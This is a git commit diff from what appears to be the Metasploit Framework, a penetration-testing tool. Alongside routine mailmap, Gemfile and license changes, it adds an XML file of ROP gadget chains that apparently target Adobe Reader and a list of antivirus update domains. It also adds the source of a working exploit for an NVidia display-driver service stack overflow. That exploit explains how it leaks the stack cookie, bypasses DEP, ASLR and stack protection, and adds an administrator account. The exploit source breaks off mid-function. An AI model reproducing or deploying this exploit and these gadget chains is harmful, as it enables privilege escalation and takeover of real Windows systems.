Merge pull request #4 from jvazquez-r7/review_2763

Update against upstream
bug/bundler_fix
Borja Merino 2014-01-02 13:02:46 -08:00
commit dfe4e334fc
208 changed files with 13383 additions and 4132 deletions

View File

@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com> dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com> ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com> hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net> hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com> jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com> limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com> shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com> todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com> todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com> wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com> wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com> wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com> wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are # Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at # volunteers, former employees, and potential Rapid7 employees who, at
@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io> OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local> r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com> r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us> scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org> skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com> spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com> swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>

View File

@ -2,6 +2,8 @@ source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern # Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0' gem 'activesupport', '>= 3.0.0'
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
gem 'bcrypt-ruby'
# Needed for some admin modules (scrutinizer_add_user.rb) # Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json' gem 'json'
# Needed by msfgui and other rpc components # Needed by msfgui and other rpc components
@ -17,7 +19,7 @@ group :db do
# Needed for Msf::DbManager # Needed for Msf::DbManager
gem 'activerecord' gem 'activerecord'
# Database models shared between framework and Pro. # Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6' gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails # Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11' gem 'pg', '>= 0.11'
end end

View File

@ -13,6 +13,7 @@ GEM
i18n (~> 0.6, >= 0.6.4) i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0) multi_json (~> 1.0)
arel (3.0.2) arel (3.0.2)
bcrypt-ruby (3.1.2)
builder (3.0.4) builder (3.0.4)
database_cleaner (1.1.1) database_cleaner (1.1.1)
diff-lcs (1.2.4) diff-lcs (1.2.4)
@ -21,7 +22,7 @@ GEM
fivemat (1.2.1) fivemat (1.2.1)
i18n (0.6.5) i18n (0.6.5)
json (1.8.0) json (1.8.0)
metasploit_data_models (0.16.6) metasploit_data_models (0.16.9)
activerecord (>= 3.2.13) activerecord (>= 3.2.13)
activesupport activesupport
pg pg
@ -61,11 +62,12 @@ PLATFORMS
DEPENDENCIES DEPENDENCIES
activerecord activerecord
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
bcrypt-ruby
database_cleaner database_cleaner
factory_girl (>= 4.1.0) factory_girl (>= 4.1.0)
fivemat (= 1.2.1) fivemat (= 1.2.1)
json json
metasploit_data_models (~> 0.16.6) metasploit_data_models (~> 0.16.9)
msgpack msgpack
network_interface (~> 0.0.1) network_interface (~> 0.0.1)
nokogiri nokogiri

87
LICENSE
View File

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com> 2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/* Files: external/source/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/* Files: external/source/metsvc/*
Copyright: 2007, Determina Inc. Copyright: 2007, Determina Inc.
License: BSD-3-clause License: BSD-3-clause

Binary file not shown.

132
data/ropdb/reader.xml Normal file
View File

@ -0,0 +1,132 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>9</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x2313d">pop ecx # ret</gadget>
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x0155a">pop edi # ret</gadget>
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x2d4de">pop ebx # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x44122">mov edx, ecx</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
<gadget offset="0x476ab">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>10</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x05016">pop edi # ret</gadget>
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x14241">pop ebx # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x4b49d">mov edx, ecx</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
<gadget offset="0x2a8df">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x55093">pop edi # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x60bc4">call eax # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
<gadget offset="0x463d0">pop ebx # ret</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
</gadgets>
</rop>
</db>

View File

@ -44,6 +44,8 @@
} }
else else
{ {
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
} }
%%> %%>

Binary file not shown.

Binary file not shown.

BIN
data/vncdll.x86.dll Executable file

Binary file not shown.

View File

@ -0,0 +1,28 @@
www.es-web.sophos.com
www.es-web.sophos.com.edgesuite.net
www.es-web-2.sophos.com
www.es-web-2.sophos.com.edgesuite.net
www.dnl-01.geo.kaspersky.com
www.downloads2.kaspersky-labs.com
www.liveupdate.symantecliveupdate.com
www.liveupdate.symantec.com
www.update.symantec.com
www.update.nai.com
www.download797.avast.com
www.guru.avg.com
www.osce8-p.activeupdate.trendmicro.com
www.forefrontdl.microsoft.com
es-web.sophos.com
es-web.sophos.com.edgesuite.net
es-web-2.sophos.com
es-web-2.sophos.com.edgesuite.net
dnl-01.geo.kaspersky.com
downloads2.kaspersky-labs.com
liveupdate.symantecliveupdate.com
liveupdate.symantec.com
update.symantec.com
update.nai.com
download797.avast.com
guru.avg.com
osce8-p.activeupdate.trendmicro.com
forefrontdl.microsoft.com

File diff suppressed because it is too large Load Diff

View File

@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q" rake yard
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf

View File

@ -70,7 +70,8 @@
<AdditionalOptions>/ignore:4070</AdditionalOptions> <AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent> <PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command> <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent> </PostBuildEvent>
<ResourceCompile> <ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>

View File

@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\nvidia_nvsvc.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-0109 NVidia nvsvc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="NVidia nvsvc is not supported in x64" />
</Target>
</Project>

View File

@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -0,0 +1,33 @@
//===============================================================================================//
// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "nvidia_nvsvc.h"
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
elevate_nvidia_nvsvc(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}

View File

@ -0,0 +1,546 @@
/*
NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012
- Bypass DEP + ASLR + /GS + CoE
=============================================================
(@peterwintrsmith)
** Initial release 25/12/12
** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks
@seanderegge!
Hey all!
Here is an interesting exploit for a stack buffer overflow in the NVidia
Display Driver Service. The service listens on a named pipe (\pipe\nsvr)
which has a NULL DACL configured, which should mean that any logged on user
or remote user in a domain context (Windows firewall/file sharing
permitting) should be able to exploit this vulnerability.
The buffer overflow occurs as a result of a bad memmove operation, with the
stack layout effectively looking like this:
[locals]
[received-data]
[response-buf]
[stack cookie]
[return address]
[arg space]
[etc]
The memmove copies data from the received-data buffer into the response-buf
buffer, unchecked. It is possible to control the offset from which the copy
starts in the received-data buffer by embedding a variable length string -
which forms part of the protocol message being crafted - as well as the
number of bytes copied into the response buffer.
The amount of data sent back over the named pipe is related to the number
of bytes copied rather than the maximum number of bytes that the buffer is
able to safely contain, so it is possible to leak stack data by copying
from the end of the received-data buffer, through the response-buf buffer
(which is zeroed first time round, and second time round contains whatever
was in it beforehand), right to the end of the stack frame (including stack
cookie and return address).
As the entire block of data copied is sent back, the stack cookie and
nvvsvc.exe base can be determined using the aforementioned process. The
stack is then trashed, but the function servicing pipe messages won't
return until the final message has been received, so it doesn't matter too
much.
It is then possible to exploit the bug by sending two further packets of
data: One containing the leaked stack cookie and a ROP chain dynamically
generated using offsets from the leaked nvvsvc.exe base (which simply fills
the response-buf buffer when this data is echoed back) and a second packet
which contains enough data to trigger an overwrite if data is copied from
the start of the received-data buffer into the response-buf (including the
data we primed the latter to contain - stack cookie and ROP chain).
Allowing the function to then return leads to execution of our ROP chain,
and our strategically placed Metasploit net user /add shellcode! We get
continuation of execution for free because the process spins up a thread
to handle each new connection, and there are no deadlocks etc.
I've included two ROP chains, one which works against the nvvsvc.exe
running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers
from the Dell site, and one which works against the latest version of the
drivers for the same card, from:
http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
http://www.geforce.co.uk/drivers/results/54709
Hope you find this interesting - it's a fun bug to play with!
- Sample Session -
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Peter
The command completed successfully.
C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
[@peterwintrsmith]
- Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
Action 1 of 9: - CONNECT
Action 2 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 3 of 9: - SERVER => CLIENT
Read 16504 (0x4078) characters from pipe
Action 4 of 9: Building exploit ...
=> Stack cookie 0xe2e2893340d4:
=> nvvsvc.exe base 0x13fb90000:
Action 5 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 6 of 9: - SERVER => CLIENT
Read 16384 (0x4000) characters from pipe
Action 7 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 8 of 9: - SERVER => CLIENT
Read 16896 (0x4200) characters from pipe
Action 9 of 9: - DISCONNECT
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Peter
r00t
The command completed successfully.
C:\Users\Peter\Desktop\NVDelMe1>
*/
#include <Windows.h>
#include <stdio.h>
extern "C" {
#include "nvidia_nvsvc.h"
}
enum EProtocolAction
{
ProtocolAction_Connect = 0,
ProtocolAction_Receive,
ProtocolAction_Send,
ProtocolAction_Disconnect,
ProtocolAction_ReadCookie,
};
typedef struct
{
EProtocolAction Action;
PBYTE Buf;
DWORD Length;
} ProtocolMessage;
const int GENERIC_BUF_LENGTH = 0x10000;
#define WriteByte(val) {buf[offs] = val; offs += 1;}
#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;}
#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;}
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
#define BufRemaining() (sizeof(buf) - offs)
DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
{
DWORD dwWritten = 0;
if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
{
return dwWritten;
}
return 0;
}
DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
{
DWORD dwRead = 0, dwAvailable = 0;
if (bTimeout)
{
for (DWORD i = 0; i < 30; i++)
{
if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
{
goto Cleanup;
}
if (dwAvailable)
{
break;
}
Sleep(100);
}
if (!dwAvailable)
{
goto Cleanup;
}
}
if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
{
goto Cleanup;
}
Cleanup:
return dwRead;
}
HANDLE EstablishPipeConnection(char *pszPipe)
{
HANDLE hPipe = CreateFileA(
pszPipe,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hPipe == INVALID_HANDLE_VALUE)
{
return NULL;
}
return hPipe;
}
BYTE *BuildMalicious_LeakStack()
{
static BYTE buf[0x4020] = {0};
UINT offs = 0;
WriteWord(0x52);
for(UINT i=0; i<0x2000; i++)
WriteWord(0x41);
WriteWord(0);
WriteDword(0);
WriteDword(0x4078);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
return buf;
}
BYTE *BuildMalicious_FillBuf()
{
static BYTE buf[0x4020] = {0};
UINT offs = 0;
WriteWord(0x52);
WriteWord(0); // string
WriteDword(0);
WriteDword(0x4000);
while(BufRemaining())
WriteDword(0x43434343);
return buf;
}
BYTE *BuildMalicious_OverwriteStack()
{
static BYTE buf[0x4020] = { 0 };
UINT offs = 0;
WriteWord(0x52);
WriteWord(0); // string
WriteDword(0);
WriteDword(0x4340); // enough to copy shellcode too
while (BufRemaining())
{
WriteDword(0x42424242);
}
return buf;
}
/*!
* @brief Entry point for the exploit code.
* @param payload Pointer to the payload memory, which must be NULL terminated.
*/
VOID elevate_nvidia_nvsvc(LPVOID payload)
{
SIZE_T payloadLen = strlen((char*)payload) + 1;
DWORD dwReturnCode = 1, dwBytesInOut = 0;
HANDLE hPipe = NULL;
static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 };
memset(rgReadBuf, 0, sizeof(rgReadBuf));
ProtocolMessage rgConvoMsg[] =
{
{ ProtocolAction_Connect, NULL, 0 },
